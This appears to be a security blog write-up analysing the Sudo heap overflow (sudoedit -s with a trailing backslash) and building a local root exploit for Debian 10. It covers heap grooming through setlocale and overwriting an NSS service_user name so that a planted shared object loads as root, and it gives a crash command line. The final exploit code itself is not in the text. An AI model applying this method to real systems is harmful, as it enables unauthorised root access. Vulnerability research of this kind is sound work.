Recently the Qualys Research Team did an amazing job discovering a Heap overflow vulnerability in Sudo. In the next sections, we will analyze the bug and we will write an exploit to gain root privileges on Debain 10.
Before analyzing the vulnerability, we need to set up a debugging environment. For this article, I will use:
- Linux distribution: Debain 10 (Buster)
- System info:
Linux debian 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
- Debugger: GDB + PWNDBG
- Package version:
- Checksum (sha256):
- Source code: sudo-1.8.27.tar.gz
- Package version:
- Glibc version:
- Checksum (sha256):
- Source code: glibc-2.28.zip
- Glibc version:
At the end of the page, you can find the link to download all the files used in this article.
(For debugging purposes, I will temporarily disable ALSR)
Agrument parsing is not a joke
As we can see from the Qualys’ article, executing Sudo with the
-s option, the Sudo’s
MODE_SHELL flag will be set, then, at the beginning of Sudo’s main() function, the parse_args() function will be called, and it will concatenate the command line arguments, escaping all meta-characters with backslashes:
The Qualys researchers has discovered that if a command line argument ends with a single backslash, then:
At line 834, at some point,
fromwill be the backslash and
fromwill be the NULL terminator at the end of the argument, so the
!isspace((unsigned char)from)will return true.
Since the condition at line 834 will be satisfied, at line 835
fromwill be incremented by one, pointing to the NULL terminator.
At line 836 the NULL terminator will be copied in the heap and
fromwill be incremented by one again, pointing out of the argument’s bounds.
The while loop will continue copying every character out of the argument’s bounds into the heap but since
sizeat line 821 was defined as
strlen(argument) + 1, this will cause a heap overflow.
There are some necessary conditions to satisfy to reach the vulnerable code:
- At line 787,
MODE_CHECKmust be set.
- At line 826,
MODE_LOGIN_SHELLmust be set.
The problem is that, if
MODE_LOGIN_SHELL are set, then the condition at line 559 in
parse_args() will be satisfied before reaching the vulnerable code, and the meta-characters will be escaped.
Apparently, there should not be a way to set
MODE_EDIT without setting
MODE_RUN, indeed, as we can see from
If we set
MODE_NONINTERACTIVE flag will be set at line 353, so we will not be able to set the
MODE_SHELL flag, and if we set the
MODE_CHECK flag, the other mode flags will be removed at line 501.
The Qualys’ researchers also managed to bypass these checks, executing Sudo as
As we can see from the code above (always from
parse_args()), if we execute Sudo as
sudoedit, it will automatically add the
valid_flags will be preserved. Indeed,
DEFAULT_VALID_FLAGS is defined as:
sudoedit with the
-s option, we will set the
MODE_EDIT flag and the
MODE_SHELL flag, but since the
MODE_RUN flag will not be set, we will be able to reach the vulnerable code with an argument that ends with a backslash and it will not be escaped.
sudoedit -s '\' $(python3 -c 'print("A"*0x10000)') will cause a memory corruption:
The Qualys Team, using a fuzzer, collected various crashes, three of them can lead to code execution.
Let’s use GDB to see what happens when the heap overflow occurs.
We can write a couple of lines in python to start the process and immediately stop it using SIGSTOP, in this way we will be able to attach our debugger.
Is important to note that we need root privileges to attach GDB to Sudo, and we cannot run it inside GDB as a non-privileged user, otherwise it will return the following, self-explanatory, error:
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges?
To make the debugging session easier, I copied the necessary source code files in a folder called
src and then I used the following GDB script to automate the first debugging steps:
We can proceed running
sudoedit using our python script and attaching GDB to the process using the following command:
As we can see from the image above,
size is equal to 16, it is nothing more than:
strlen("AAAAAAAAAAAAAA\\") + 1. In RAX we can see the heap pointer returned by
Using the pwndbg’s
vis_heap_chunks feature, we can visualize the allocated heap chunk. As we can see its size is 32 bytes:
continue, we will hit the second breakpoint in the
set_cmnd() function. Here the arguments will be copied from the stack to the heap:
continue multiple times, the function will copy our “A”s into the heap, then the backslash, since it has not been escaped by
parse_args(), will escape the following NULL terminator, that will be copied into the heap and then the while loop will continue, copying every character out of the argument’s bounds. Since on the stack,
argv is followed by
envp, the environment variable
BBBBB=CCCCC will be copied into the heap:
As expected, this will result in a heap overflow. Using
vis_heap_chunks we can clearly see that we overwritten the size of the next chunk with the last two characters of the environment variable:
The next step is to transform this heap overflow into code execution.
GNU Name Service Switch (NSS)
At line 318 in
sudoers_policy_main(), Sudo will call sudoers_lookup() to look up users in the sudoers group and see if they are allowed to run the specified command on the host as the target. To do that, Sudo will rely on the Name Service Switch (NSS).
As we can read from gnu.org:
And from NSS Basics:
Available databases and respective services are defined in
/etc/nsswitch.conf. Each database has its own services and each service corresponds to a shared object which offers various functions.
From The Naming Scheme of the NSS Modules we can see that:
Sudo will use __nss_database_lookup() to look up the needed database and the respective service:
Then it will pass the service structure, now assigned to the
ni variable, and the required function name to __nss_lookup_function().
If the module corresponding to the service has already been loaded,
__nss_lookup_function() will directly proceed constructing the function name and looking up the symbol in the shared object. Otherwise,
__nss_lookup_function() will call nss_load_library() that after constructing the module name will call __libc_dlopen_mode() to effectively load the shared object into memory (Mind this point, it will be extremely important in the exploitation phase):
At this point
nss_load_library() will return,
__nss_lookup_function() will construct the function name and then it will look up the symbol in the loaded shared object using __libc_dlsym():
(If you are interested in dynamic linking, check out my ret2dl_resolve article)
Four important structures involved in this process, are respectively:
- name_database, which describes a database:
- name_database_entry, which describes a database entry.
- service_user, which describes a service.
- service_library, which describes a library.
These structures will be used to look up the database and the service with the corresponding library. They will be of primary importance in the exploitation phase.
Let’s proceed adding a couple of breakpoints to our GDB script to analyze this process in memory:
We can reach the heap overflow point and use
continue again to hit the breakpoint in
From the image above, we can see that Sudo is looking for the
group database. Now, using
continue one more time, we will directly hit the breakpoint at the end of
As we can see from the registers, Sudo is trying to look up the
_nss_files_initgroups_dyn symbol in the
files library. It didn’t call
nss_load_library() because there was already a valid library handle in the
service_library structure (basically the shared object has already been loaded):
continue again, we will hit the breakpoint in
This time, after constructing the library name (
libnss_systemd.so.2, stored in RDI), Sudo is trying to use
__libc_dlopen_mode() to load the shared object in memory. This means that the library has not already been loaded. Let’s take a look to the
lib_handle field of the
service_library structure this time is NULL. It will be populated with the value returned by
Sudo will proceed loading the shared object in memory, constructing the requested function name, and finding the symbol in the library using
Now that we have a decent knowledge of how NSS works, we can start writing our exploit.
We know that the NSS library name will be constructed in
nss_load_library() by the following piece of code:
From an attacker prospective, this means that if we manage to overwrite the
name field in the corresponding
service_user structure (assigned to the
ni variable in
__nss_database_lookup()), with a string controlled by us, for example
XXXXXX/XXXXXX, the resulting string will be
__libc_dlopen_mode(), being unable to find the shared object in the default directory (
/usr/lib/x86_64-linux-gnu/), will look for it in the folder
libnss_XXXXXX in the current directory.
At this point we could simply write a malicious shared object, hijack the constructor and gain root privileges.
The first problem arises from the heap layout. Let’s do a step back and let’s visualize the structures in memory, starting from the
name_database structure, assigned to the
service_table variable in
If we look at the addresses, we can immediately notice that they are basically contiguous in memory. It means that if we want to use our heap overflow to overwrite the
name field in one of the
service_user structures, we will almost inevitably overwrite other pointers “along the way”, probably causing a segmentation fault.
For example, even if we managed to obtain an allocation at
0x55555557db00, right before the first database entry, targeting the string
0x55555557dc30, our overflow would overwrite multiple database entries, multiple services and so on. In other words, the overflow would completely destroy the structures in memory.
We need, in some way, to control the heap layout. Do we have any resource that we can use to create “holes” in the heap? The answer is yes!
At the very beginning of the Sudo’s
main() function, there is a call to setlocale():
setlocale() source code, we can see that it will use
free() multiple times to allocate/deallocate localization variables. As we can read from opengroup.org:
It means that we can use a string of an arbitrary length as
@modifier to control the size of the environment variable. Afterwards, the allocated memory region will be freed, and will create a “hole” in the heap. Hopefully using this method we will be able to control the heap layout.
For our first test, let’s use an argument size of 16 bytes, an envp size of 256 bytes and a LC modifier of 57 bytes. Moreover, let’s set
SUDO_ASKPASS=/bin/false to prevent Sudo from asking the user’s password:
(Of course to identify the correct combination of sizes I had to spend some time in GDB)
Let’s modify our python script to run our C program instead of directly execute
continue multiple times, we can reach the breakpoint in
__nss_database_lookup(), from here, let’s use the
search command to find the
LC_TIME variable in memory:
Now let’s take a look to the structures in memory:
name_database structure (previously assigned to the variable
service_table), its first entry and the next one, are respectively located at
0x55555557e920 but now, as we can see, the first address highlighted in green, the
service_user structure in the second database entry (
group), is located at
0x555555580ea0, more than two pages (0x2000 bytes) away from the other structures!
This is a very good news for us, because if we manage to obtain an allocation between the second database entry and the location of its first service, we will be able to use the heap overflow to overwrite the
name field in the
Let’s use the
tcachebins command to visualize the current available chunks in tcache:
Awesome! We have three available 0x40 chunks between the second database entry and its first service! Hopefully, allocating a user buffer of a certain size, we should be able to obtain an allocation in one of these chunks.
After updating the
USER_BUFF_SIZE variable in the code of our exploit, from 16 bytes to 48 bytes (0x30), let’s run the program again, reaching the breakpoint in
__nss_database_lookup() and then let’s use
search to locate our buffer in memory:
Perfect! We got an allocation in one of the three chunks:
0x555555580500. Now we only need to modify the
envp size to overwrite the
name field of the
files service. As we have seen in the previous section, the shared object corresponding to the
files service, has already been loaded in memory, so
__nss_lookup_function() will directly try to look up the symbol in the library instead of using
nss_load_library() to load it. We can simply overcome this problem setting the library pointer to NULL.
Wait, but how can we use NULL bytes in
envp? Simple, we can populate
envp with many backslashes: since they will not be escaped, they will actually escape the following NULL terminator that will be copied into the heap by
set_cmnd() (Exactly what we have already seen in the first debugging session)!
Now we can do some math and calculate the right size to overwrite the
name field of the
files service in the
As we can see in GDB, as expected,
set_cmnd() will escape the NULL bytes copying them into the heap:
After the heap overflow, we will be able to set every field in the target
service_user structure to NULL, and the
name field to
Finally, as expected,
nss_load_library() will construct the library name using our malicious name, and it will try to load the shared object from the
libnss_XXXXXX folder in the current directory using
At this point we only need to write a malicious shared object, called
XXXXXXX.so.2 and place it in a folder called
libnss_XXXXXX in the current directory:
Executing our exploit again, we will be able to hijack the library and gain root privileges:
As a side note, I also managed to obtain root privileges hijacking a
service_user structure, overwriting the last two bytes of the
service field in the corresponding database entry to make it point in an upper section of the heap, then I created a fake
service_user structure in this region with a malicious
Now, because of slightly differences in the heap layout from system to system, we cannot hard code sizes in our exploit. For example, another Debain 10 might require a different
ENVP_SIZE size and/or a different
LC_SIZE, I did some tests and I managed to find a pattern that actually works for multiple systems. Bruteforcing will be required to find the right combinations of sizes. Our final exploit will be the following:
It will accept
envp_size from command line, so we can use the following bash script to run it:
We can enable ASLR and run the exploit:
That’s it! We have our exploit for Debian 10! If you have any question, feel free to contact me. You can download all the files used in this article from my personal GitHub repository:
The exploit is currently tested on:
Version 1.8.27 (1.8.27-1+deb10u2) Checksum (sha256): ca4a94e0a49f59295df5522d896022444cbbafdec4d94326c1a7f333fd030038
Version 2.28 Checksum (sha256): dedb887a5c49294ecd850d86728a0744c0e7ea780be8de2d4fc89f6948386937
Linux debian 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux Linux debian 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux